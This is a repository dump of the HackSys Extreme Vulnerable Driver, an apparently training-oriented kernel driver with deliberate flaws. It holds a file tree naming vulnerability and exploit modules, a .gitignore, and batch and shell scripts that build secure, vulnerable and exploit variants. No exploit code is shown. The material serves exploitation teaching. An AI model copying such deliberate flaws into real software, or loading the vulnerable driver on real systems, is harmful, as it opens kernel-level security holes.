├── .gitignore
├── Builder
├── Build_HEVD_All.bat
├── Build_HEVD_All.sh
├── Build_HEVD_Exploit.bat
├── Build_HEVD_Secure_arm64.bat
├── Build_HEVD_Secure_x64.bat
├── Build_HEVD_Secure_x64.sh
├── Build_HEVD_Secure_x86.bat
├── Build_HEVD_Vulnerable_arm64.bat
├── Build_HEVD_Vulnerable_x64.bat
├── Build_HEVD_Vulnerable_x64.sh
└── Build_HEVD_Vulnerable_x86.bat
├── CONTRIBUTING.md
├── Driver
├── CMake
│ ├── DetectOS.cmake
│ ├── LKM.cmake
│ └── WDK.cmake
├── CMakeLists.txt
└── HEVD
│ ├── CMakeLists.txt
│ ├── Linux
│ ├── ArbitraryWrite.c
│ ├── ArbitraryWrite.h
│ ├── BufferOverflowStack.c
│ ├── BufferOverflowStack.h
│ ├── CMakeLists.txt
│ ├── Common.h
│ ├── HackSysExtremeVulnerableDriver.c
│ ├── HackSysExtremeVulnerableDriver.h
│ ├── IntegerOverflow.c
│ ├── IntegerOverflow.h
│ ├── UninitializedMemoryStack.c
│ └── UninitializedMemoryStack.h
│ └── Windows
│ ├── ArbitraryIncrement.c
│ ├── ArbitraryIncrement.h
│ ├── ArbitraryReadWriteHelperNonPagedPoolNx.c
│ ├── ArbitraryReadWriteHelperNonPagedPoolNx.h
│ ├── ArbitraryWrite.c
│ ├── ArbitraryWrite.h
│ ├── BufferOverflowNonPagedPool.c
│ ├── BufferOverflowNonPagedPool.h
│ ├── BufferOverflowNonPagedPoolNx.c
│ ├── BufferOverflowNonPagedPoolNx.h
│ ├── BufferOverflowPagedPoolSession.c
│ ├── BufferOverflowPagedPoolSession.h
│ ├── BufferOverflowStack.c
│ ├── BufferOverflowStack.h
│ ├── BufferOverflowStackGS.c
│ ├── BufferOverflowStackGS.h
│ ├── CMakeLists.txt
│ ├── Common.h
│ ├── DoubleFetch.c
│ ├── DoubleFetch.h
│ ├── HEVD.inf
│ ├── HEVD.pfx
│ ├── HEVD.sln
│ ├── HackSysExtremeVulnerableDriver.c
│ ├── HackSysExtremeVulnerableDriver.h
│ ├── HackSysExtremeVulnerableDriver.vcxproj
│ ├── HackSysExtremeVulnerableDriver.vcxproj.filters
│ ├── InsecureKernelResourceAccess.c
│ ├── InsecureKernelResourceAccess.h
│ ├── IntegerOverflow.c
│ ├── IntegerOverflow.h
│ ├── MemoryDisclosureNonPagedPool.c
│ ├── MemoryDisclosureNonPagedPool.h
│ ├── MemoryDisclosureNonPagedPoolNx.c
│ ├── MemoryDisclosureNonPagedPoolNx.h
│ ├── NullPointerDereference.c
│ ├── NullPointerDereference.h
│ ├── TypeConfusion.c
│ ├── TypeConfusion.h
│ ├── UninitializedMemoryPagedPool.c
│ ├── UninitializedMemoryPagedPool.h
│ ├── UninitializedMemoryStack.c
│ ├── UninitializedMemoryStack.h
│ ├── UseAfterFreeNonPagedPool.c
│ ├── UseAfterFreeNonPagedPool.h
│ ├── UseAfterFreeNonPagedPoolNx.c
│ ├── UseAfterFreeNonPagedPoolNx.h
│ ├── WriteNULL.c
│ └── WriteNULL.h
├── Exploit
├── ArbitraryOverwrite.c
├── ArbitraryOverwrite.h
├── Common.c
├── Common.h
├── DoubleFetch.c
├── DoubleFetch.h
├── HackSysEVDExploit.c
├── HackSysEVDExploit.h
├── HackSysEVDExploit.sln
├── HackSysEVDExploit.vcxproj
├── HackSysEVDExploit.vcxproj.filters
├── InsecureKernelResourceAccess.c
├── InsecureKernelResourceAccess.h
├── IntegerOverflow.c
├── IntegerOverflow.h
├── NullPointerDereference.c
├── NullPointerDereference.h
├── Payloads.c
├── Payloads.h
├── PoolOverflow.c
├── PoolOverflow.h
├── StackOverflow.c
├── StackOverflow.h
├── StackOverflowGS.c
├── StackOverflowGS.h
├── TypeConfusion.c
├── TypeConfusion.h
├── UninitializedHeapVariable.c
├── UninitializedHeapVariable.h
├── UninitializedStackVariable.c
├── UninitializedStackVariable.h
├── UseAfterFree.c
├── UseAfterFree.h
└── arg.h
├── LICENSE
├── README.md
├── Screenshots
├── hevd-banner.png
├── hevd-debug-print.png
├── hevd-exploitation.png
├── hevd-help.png
├── hevd-linux-banner.png
├── hevd-linux-install-uninstall.png
├── hevd-linux-ioctl-log.png
└── hevd-linux-ioctl-tests.png
├── Tools
├── hevd_linux_installer.sh
└── hevd_linux_tests.py
├── Whitepaper
├── HackSys Extreme Vulnerable Driver.pptx
└── HackSys_Extreme_Vulnerable_Driver_Whitepaper.pdf
└── appveyor.yml
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | x64/
19 | x86/
20 | build/
21 | bld/
22 | [Bb]in/
23 | [Oo]bj/
24 | [Cc]ompile/
25 |
26 | # Visual Studio 2015 cache/options directory
27 | .vs/
28 |
29 | # MSTest test Results
30 | [Tt]est[Rr]esult*/
31 | [Bb]uild[Ll]og.*
32 |
33 | # NUNIT
34 | *.VisualState.xml
35 | TestResult.xml
36 |
37 | # Build Results of an ATL Project
38 | [Dd]ebugPS/
39 | [Rr]eleasePS/
40 | dlldata.c
41 |
42 | # DNX
43 | project.lock.json
44 | artifacts/
45 |
46 | *_i.c
47 | *_p.c
48 | *_i.h
49 | *.ilk
50 | *.meta
51 | *.obj
52 | *.pch
53 | *.pdb
54 | *.pgc
55 | *.pgd
56 | *.rsp
57 | *.sbr
58 | *.tlb
59 | *.tli
60 | *.tlh
61 | *.tmp
62 | *.tmp_proj
63 | *.log
64 | *.vspscc
65 | *.vssscc
66 | .builds
67 | *.pidb
68 | *.svclog
69 | *.scc
70 |
71 | # Chutzpah Test files
72 | _Chutzpah*
73 |
74 | # Visual C++ cache files
75 | ipch/
76 | *.aps
77 | *.ncb
78 | *.opensdf
79 | *.sdf
80 | *.cachefile
81 |
82 | # Visual Studio profiler
83 | *.psess
84 | *.vsp
85 | *.vspx
86 |
87 | # TFS 2012 Local Workspace
88 | $tf/
89 |
90 | # Guidance Automation Toolkit
91 | *.gpState
92 |
93 | # ReSharper is a .NET coding add-in
94 | _ReSharper*/
95 | *.[Rr]e[Ss]harper
96 | *.DotSettings.user
97 |
98 | # JustCode is a .NET coding add-in
99 | .JustCode
100 |
101 | # TeamCity is a build add-in
102 | _TeamCity*
103 |
104 | # DotCover is a Code Coverage Tool
105 | *.dotCover
106 |
107 | # NCrunch
108 | _NCrunch_*
109 | .*crunch*.local.xml
110 |
111 | # MightyMoose
112 | *.mm.*
113 | AutoTest.Net/
114 |
115 | # Web workbench (sass)
116 | .sass-cache/
117 |
118 | # Installshield output folder
119 | [Ee]xpress/
120 |
121 | # DocProject is a documentation generator add-in
122 | DocProject/buildhelp/
123 | DocProject/Help/*.HxT
124 | DocProject/Help/*.HxC
125 | DocProject/Help/*.hhc
126 | DocProject/Help/*.hhk
127 | DocProject/Help/*.hhp
128 | DocProject/Help/Html2
129 | DocProject/Help/html
130 |
131 | # Click-Once directory
132 | publish/
133 |
134 | # Publish Web Output
135 | *.[Pp]ublish.xml
136 | *.azurePubxml
137 | # TODO: Comment the next line if you want to checkin your web deploy settings
138 | # but database connection strings (with potential passwords) will be unencrypted
139 | *.pubxml
140 | *.publishproj
141 |
142 | # NuGet Packages
143 | *.nupkg
144 | # The packages folder can be ignored because of Package Restore
145 | **/packages/*
146 | # except build/, which is used as an MSBuild target.
147 | !**/packages/build/
148 | # Uncomment if necessary however generally it will be regenerated when needed
149 | #!**/packages/repositories.config
150 |
151 | # Windows Azure Build Output
152 | csx/
153 | *.build.csdef
154 |
155 | # Windows Store app package directory
156 | AppPackages/
157 |
158 | # Visual Studio cache files
159 | # files ending in .cache can be ignored
160 | *.[Cc]ache
161 | # but keep track of directories ending in .cache
162 | !*.[Cc]ache/
163 |
164 | # Others
165 | ClientBin/
166 | [Ss]tyle[Cc]op.*
167 | ~$*
168 | *~
169 | *.dbmdl
170 | *.dbproj.schemaview
171 | *.pfx
172 | *.publishsettings
173 | node_modules/
174 | orleans.codegen.cs
175 |
176 | # RIA/Silverlight projects
177 | Generated_Code/
178 |
179 | # Backup & report files from converting an old project file
180 | # to a newer Visual Studio version. Backup files are not needed,
181 | # because we have git ;-)
182 | _UpgradeReport_Files/
183 | Backup*/
184 | UpgradeLog*.XML
185 | UpgradeLog*.htm
186 |
187 | # SQL Server files
188 | *.mdf
189 | *.ldf
190 |
191 | # Business Intelligence projects
192 | *.rdl.data
193 | *.bim.layout
194 | *.bim_*.settings
195 |
196 | # Microsoft Fakes
197 | FakesAssemblies/
198 |
199 | # Node.js Tools for Visual Studio
200 | .ntvs_analysis.dat
201 |
202 | # Visual Studio 6 build log
203 | *.plg
204 |
205 | # Visual Studio 6 workspace options file
206 | *.opt
207 |
208 | # White-list PFX file
209 | !Driver/HEVD/Windows/HEVD.pfx
210 |
211 | # Ignore temporary build file
212 | Driver/HEVD/Linux/Kbuild
213 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_All.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 |
3 | %COMSPEC% /c Build_HEVD_Secure_x64.bat
4 | %COMSPEC% /c Build_HEVD_Secure_x86.bat
5 | %COMSPEC% /c Build_HEVD_Secure_arm64.bat
6 | %COMSPEC% /c Build_HEVD_Vulnerable_x64.bat
7 | %COMSPEC% /c Build_HEVD_Vulnerable_x86.bat
8 | %COMSPEC% /c Build_HEVD_Vulnerable_arm64.bat
9 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_All.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | $(which sh) Build_HEVD_Secure_x64.sh
4 | $(which sh) Build_HEVD_Vulnerable_x64.sh
5 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Exploit.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo.
3 | echo # # ##### #######
4 | echo # # ## #### # # # # # # #### # ###### ## # #
5 | echo # # # # # # # # # # # # # # # # ## ##
6 | echo ####### # # # #### ##### # #### # ##### # # # ## #
7 | echo # # ###### # # # # # # # # ###### # #
8 | echo # # # # # # # # # # # # # # # # # # #
9 | echo # # # # #### # # ##### # #### # ###### # # # #
10 | echo.
11 | echo HackSys Extreme Vulnerable Driver Exploit Build Utility
12 |
13 | REM store the current directory path
14 | set currentDir=%cd%
15 |
16 | REM store the local symbol server path
17 | set localSymbolServerPath=C:\Xtra\Symbols\Custom\
18 |
19 | set VC_PATH="%VS100COMNTOOLS%\..\..\VC\vcvarsall.bat"
20 |
21 | echo.
22 | echo **************************************************
23 | @call %VC_PATH% x86
24 | echo **************************************************
25 |
26 | cd %currentDir%\..\Exploit
27 |
28 | echo.
29 | echo **************************************************
30 | echo Building HackSys Extreme Vulnerable Driver Exploit
31 | echo **************************************************
32 | echo.
33 | rmdir /S /Q %currentDir%\..\compile\exploit
34 | msbuild /t:Clean;Build /p:OutDir=%currentDir%\..\compile\exploit\;Configuration=Release;Platform=Win32
35 | echo **************************************************
36 | echo.
37 | echo **************************************************
38 | echo Cleaning The Build Directory
39 | echo **************************************************
40 | echo.
41 | echo Deleting Release folder
42 | rmdir /S /Q %currentDir%\..\Exploit\Release
43 | echo ******************************************
44 |
45 | echo.
46 | echo ******************************************
47 | echo Transferring Driver Symbols to Symbol Store
48 | echo ******************************************
49 | cd "C:\Program Files\Debugging Tools for Windows (x86)"
50 | echo.
51 | symstore.exe add /r /f %currentDir%\..\compile\exploit\ /s %localSymbolServerPath% /t "ExploitSymbol" /v "1.0"
52 | echo ******************************************
53 | echo.
54 | echo ******************************************
55 | echo HackSys Extreme Vulnerable Driver Built
56 | echo Successfully
57 | echo ******************************************
58 | echo.
59 | cd %currentDir%
60 | pause
61 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Secure_arm64.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo.
3 | echo # # ##### #######
4 | echo # # ## #### # # # # # # #### # ###### ## # #
5 | echo # # # # # # # # # # # # # # # # ## ##
6 | echo ####### # # # #### ##### # #### # ##### # # # ## #
7 | echo # # ###### # # # # # # # # ###### # #
8 | echo # # # # # # # # # # # # # # # # # # #
9 | echo # # # # #### # # ##### # #### # ###### # # # #
10 | echo.
11 | echo HackSys Extreme Vulnerable Driver Build Utility
12 | echo.
13 |
14 | rem Store the current directory path
15 | set BUILD_ARCH=arm64
16 | set CURRENT_DIR=%cd%
17 | set PROJECT_NAME=HEVD
18 | set PROJECT_DIR=%CURRENT_DIR%\..\Driver\
19 |
20 | rem Get the normalized path
21 | for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"
22 |
23 | set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\secure\%BUILD_ARCH%
24 |
25 | rem VS2017U2 contains vswhere.exe
26 | if "%VSWHERE%"=="" (
27 | set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
28 | )
29 |
30 | for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
31 | set VS_INSTALL_DIR=%%i
32 | )
33 |
34 | echo [+] Visual Studio Path: %VS_INSTALL_DIR%
35 |
36 | set VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat
37 |
38 | echo [+] Executing: %VSDEVCMD_PATH%
39 |
40 | echo.
41 | @call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH% -host_arch=amd64
42 | echo.
43 |
44 | echo [+] Build target architecture: %BUILD_ARCH%
45 | echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
46 | echo [+] Build directory: %BUILD_DIR%
47 | echo [+] Removing build directory
48 |
49 | if exist %BUILD_DIR% (
50 | rmdir /S /Q "%BUILD_DIR%"
51 | )
52 |
53 | echo [+] Creating build directory
54 |
55 | mkdir "%BUILD_DIR%"
56 | cd %BUILD_DIR%
57 |
58 | echo [+] Generating build configuration files
59 |
60 | cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" -DSECURE=1 "%PROJECT_DIR%"
61 |
62 | echo.
63 | echo [+] Building secure HackSys Extreme Vulnerable Driver
64 | echo.
65 |
66 | CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v"
67 | echo.
68 |
69 | echo [+] Copying built files
70 |
71 | echo [*] %PROJECT_NAME%.sys
72 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%"
73 |
74 | echo [*] %PROJECT_NAME%.pdb
75 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"
76 |
77 | echo [*] %PROJECT_NAME%.cat
78 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"
79 |
80 | echo [*] %PROJECT_NAME%.inf
81 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
82 | echo.
83 |
84 |
85 | echo [+] Cleaning build directory
86 | for /r "%BUILD_DIR%" %%a in (*) do (
87 | if not %%~xa==.sys (
88 | if not %%~xa==.pdb (
89 | if not %%~xa==.inf (
90 | if not %%~xa==.cat (
91 | del /f /q "%%a"
92 | )
93 | )
94 | )
95 | )
96 | )
97 |
98 | rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
99 | rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
100 | echo.
101 |
102 | echo [+] Built secure HackSys Extreme Vulnerable Driver successfully
103 | cd %CURRENT_DIR%
104 | echo.
105 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Secure_x64.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo.
3 | echo # # ##### #######
4 | echo # # ## #### # # # # # # #### # ###### ## # #
5 | echo # # # # # # # # # # # # # # # # ## ##
6 | echo ####### # # # #### ##### # #### # ##### # # # ## #
7 | echo # # ###### # # # # # # # # ###### # #
8 | echo # # # # # # # # # # # # # # # # # # #
9 | echo # # # # #### # # ##### # #### # ###### # # # #
10 | echo.
11 | echo HackSys Extreme Vulnerable Driver Build Utility
12 | echo.
13 |
14 | rem Store the current directory path
15 | set BUILD_ARCH=x64
16 | set CURRENT_DIR=%cd%
17 | set PROJECT_NAME=HEVD
18 | set PROJECT_DIR=%CURRENT_DIR%\..\Driver\
19 |
20 | rem Get the normalized path
21 | for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"
22 |
23 | set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\secure\%BUILD_ARCH%
24 |
25 | rem VS2017U2 contains vswhere.exe
26 | if "%VSWHERE%"=="" (
27 | set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
28 | )
29 |
30 | for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
31 | set VS_INSTALL_DIR=%%i
32 | )
33 |
34 | echo [+] Visual Studio Path: %VS_INSTALL_DIR%
35 |
36 | set VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat
37 |
38 | echo [+] Executing: %VSDEVCMD_PATH%
39 |
40 | echo.
41 | @call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH%
42 | echo.
43 |
44 | echo [+] Build target architecture: %BUILD_ARCH%
45 | echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
46 | echo [+] Build directory: %BUILD_DIR%
47 | echo [+] Removing build directory
48 |
49 | if exist %BUILD_DIR% (
50 | rmdir /S /Q "%BUILD_DIR%"
51 | )
52 |
53 | echo [+] Creating build directory
54 |
55 | mkdir "%BUILD_DIR%"
56 | cd %BUILD_DIR%
57 |
58 | echo [+] Generating build configuration files
59 |
60 | cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" -DSECURE=1 "%PROJECT_DIR%"
61 |
62 | echo.
63 | echo [+] Building secure HackSys Extreme Vulnerable Driver
64 | echo.
65 |
66 | CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v"
67 | echo.
68 |
69 | echo [+] Copying built files
70 |
71 | echo [*] %PROJECT_NAME%.sys
72 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%"
73 |
74 | echo [*] %PROJECT_NAME%.pdb
75 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"
76 |
77 | echo [*] %PROJECT_NAME%.cat
78 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"
79 |
80 | echo [*] %PROJECT_NAME%.inf
81 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
82 | echo.
83 |
84 |
85 | echo [+] Cleaning build directory
86 | for /r "%BUILD_DIR%" %%a in (*) do (
87 | if not %%~xa==.sys (
88 | if not %%~xa==.pdb (
89 | if not %%~xa==.inf (
90 | if not %%~xa==.cat (
91 | del /f /q "%%a"
92 | )
93 | )
94 | )
95 | )
96 | )
97 |
98 | rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
99 | rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
100 | echo.
101 |
102 | echo [+] Built secure HackSys Extreme Vulnerable Driver successfully
103 | cd %CURRENT_DIR%
104 | echo.
105 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Secure_x64.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | BANNER="
4 | # # ##### #######
5 | # # ## #### # # # # # # #### # ###### ## # #
6 | # # # # # # # # # # # # # # # # ## ##
7 | ####### # # # #### ##### # #### # ##### # # # ## #
8 | # # ###### # # # # # # # # ###### # #
9 | # # # # # # # # # # # # # # # # # # #
10 | # # # # #### # # ##### # #### # ###### # # # #
11 |
12 | HackSys Extreme Vulnerable Driver Build Utility
13 | "
14 |
15 | echo "${BANNER}"
16 |
17 | # Standard constants
18 | BUILD_ARCH=x64
19 | CURRENT_DIR=$PWD
20 | PROJECT_NAME=hevd
21 | PROJECT_DIR="$(realpath -m ${CURRENT_DIR}/../Driver)"
22 | BUILD_DIR="$(realpath -m ${PROJECT_DIR}/../_build)"
23 | BINARY_DIR="$(realpath -m ${PROJECT_DIR}/../build/driver/linux/secure/${BUILD_ARCH})"
24 |
25 | echo "[+] Build target architecture: ${BUILD_ARCH}"
26 | echo "[+] Host Architecture: $(uname -m)"
27 | echo "[+] Build directory: ${BUILD_DIR}"
28 | echo "[+] Binary directory: ${BINARY_DIR}"
29 | echo "[+] Removing build & binary directory"
30 |
31 | if [ -d "${BUILD_DIR}" ]; then
32 | rm -rfd ${BUILD_DIR}
33 | fi
34 |
35 | if [ -d "${BINARY_DIR}" ]; then
36 | rm -rfd ${BINARY_DIR}
37 | fi
38 |
39 | echo "[+] Creating build directory"
40 |
41 | mkdir -p ${BUILD_DIR}
42 | cd ${BUILD_DIR}
43 |
44 | echo "[+] Generating build configuration files"
45 |
46 | $(which cmake) -G "Unix Makefiles" -DSECURE=1 "${PROJECT_DIR}"
47 |
48 | echo
49 | echo "[+] Building secure HackSys Extreme Vulnerable Driver"
50 | echo
51 |
52 | $(which make)
53 | echo
54 |
55 | echo "[+] Creating binary directory"
56 | mkdir -p ${BINARY_DIR}
57 |
58 | echo "[+] Copying built files"
59 |
60 | echo "[*] ${PROJECT_NAME}.ko"
61 | mv -f "${BUILD_DIR}/${PROJECT_NAME}.ko" "${BINARY_DIR}"
62 | echo
63 |
64 | echo "[+] Cleaning build directory"
65 |
66 | $(which make) clean
67 | rm -rf ${BUILD_DIR}
68 |
69 | echo "[+] Built secure HackSys Extreme Vulnerable Driver successfully"
70 | echo
71 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Secure_x86.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo.
3 | echo # # ##### #######
4 | echo # # ## #### # # # # # # #### # ###### ## # #
5 | echo # # # # # # # # # # # # # # # # ## ##
6 | echo ####### # # # #### ##### # #### # ##### # # # ## #
7 | echo # # ###### # # # # # # # # ###### # #
8 | echo # # # # # # # # # # # # # # # # # # #
9 | echo # # # # #### # # ##### # #### # ###### # # # #
10 | echo.
11 | echo HackSys Extreme Vulnerable Driver Build Utility
12 | echo.
13 |
14 | rem Store the current directory path
15 | set BUILD_ARCH=x86
16 | set CURRENT_DIR=%cd%
17 | set PROJECT_NAME=HEVD
18 | set PROJECT_DIR=%CURRENT_DIR%\..\Driver\
19 |
20 | rem Get the normalized path
21 | for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"
22 |
23 | set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\secure\%BUILD_ARCH%
24 |
25 | rem VS2017U2 contains vswhere.exe
26 | if "%VSWHERE%"=="" (
27 | set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
28 | )
29 |
30 | for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
31 | set VS_INSTALL_DIR=%%i
32 | )
33 |
34 | echo [+] Visual Studio Path: %VS_INSTALL_DIR%
35 |
36 | set VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat
37 |
38 | echo [+] Executing: %VSDEVCMD_PATH%
39 |
40 | echo.
41 | @call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH%
42 | echo.
43 |
44 | echo [+] Build target architecture: %BUILD_ARCH%
45 | echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
46 | echo [+] Build directory: %BUILD_DIR%
47 | echo [+] Removing build directory
48 |
49 | if exist %BUILD_DIR% (
50 | rmdir /S /Q "%BUILD_DIR%"
51 | )
52 |
53 | echo [+] Creating build directory
54 |
55 | mkdir "%BUILD_DIR%"
56 | cd %BUILD_DIR%
57 |
58 | echo [+] Generating build configuration files
59 |
60 | cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" -DSECURE=1 "%PROJECT_DIR%"
61 |
62 | echo.
63 | echo [+] Building secure HackSys Extreme Vulnerable Driver
64 | echo.
65 |
66 | CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v"
67 | echo.
68 |
69 | echo [+] Copying built files
70 |
71 | echo [*] %PROJECT_NAME%.sys
72 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%"
73 |
74 | echo [*] %PROJECT_NAME%.pdb
75 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"
76 |
77 | echo [*] %PROJECT_NAME%.cat
78 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"
79 |
80 | echo [*] %PROJECT_NAME%.inf
81 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
82 | echo.
83 |
84 |
85 | echo [+] Cleaning build directory
86 | for /r "%BUILD_DIR%" %%a in (*) do (
87 | if not %%~xa==.sys (
88 | if not %%~xa==.pdb (
89 | if not %%~xa==.inf (
90 | if not %%~xa==.cat (
91 | del /f /q "%%a"
92 | )
93 | )
94 | )
95 | )
96 | )
97 |
98 | rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
99 | rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
100 | echo.
101 |
102 | echo [+] Built secure HackSys Extreme Vulnerable Driver successfully
103 | cd %CURRENT_DIR%
104 | echo.
105 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Vulnerable_arm64.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo.
3 | echo # # ##### #######
4 | echo # # ## #### # # # # # # #### # ###### ## # #
5 | echo # # # # # # # # # # # # # # # # ## ##
6 | echo ####### # # # #### ##### # #### # ##### # # # ## #
7 | echo # # ###### # # # # # # # # ###### # #
8 | echo # # # # # # # # # # # # # # # # # # #
9 | echo # # # # #### # # ##### # #### # ###### # # # #
10 | echo.
11 | echo HackSys Extreme Vulnerable Driver Build Utility
12 | echo.
13 |
14 | rem Store the current directory path
15 | set BUILD_ARCH=arm64
16 | set CURRENT_DIR=%cd%
17 | set PROJECT_NAME=HEVD
18 | set PROJECT_DIR=%CURRENT_DIR%\..\Driver\
19 |
20 | rem Get the normalized path
21 | for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"
22 |
23 | set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\vulnerable\%BUILD_ARCH%
24 |
25 | rem VS2017U2 contains vswhere.exe
26 | if "%VSWHERE%"=="" (
27 | set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
28 | )
29 |
30 | for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
31 | set VS_INSTALL_DIR=%%i
32 | )
33 |
34 | echo [+] Visual Studio Path: %VS_INSTALL_DIR%
35 |
36 | set VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat
37 |
38 | echo [+] Executing: %VSDEVCMD_PATH%
39 |
40 | echo.
41 | @call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH% -host_arch=amd64
42 | echo.
43 |
44 | echo [+] Build target architecture: %BUILD_ARCH%
45 | echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
46 | echo [+] Build directory: %BUILD_DIR%
47 | echo [+] Removing build directory
48 |
49 | if exist %BUILD_DIR% (
50 | rmdir /S /Q "%BUILD_DIR%"
51 | )
52 |
53 | echo [+] Creating build directory
54 |
55 | mkdir "%BUILD_DIR%"
56 | cd %BUILD_DIR%
57 |
58 | echo [+] Generating build configuration files
59 |
60 | cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" "%PROJECT_DIR%"
61 |
62 | echo.
63 | echo [+] Building vulnerable HackSys Extreme Vulnerable Driver
64 | echo.
65 |
66 | CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v"
67 | echo.
68 |
69 | echo [+] Copying built files
70 |
71 | echo [*] %PROJECT_NAME%.sys
72 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%"
73 |
74 | echo [*] %PROJECT_NAME%.pdb
75 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"
76 |
77 | echo [*] %PROJECT_NAME%.cat
78 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"
79 |
80 | echo [*] %PROJECT_NAME%.inf
81 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
82 | echo.
83 |
84 |
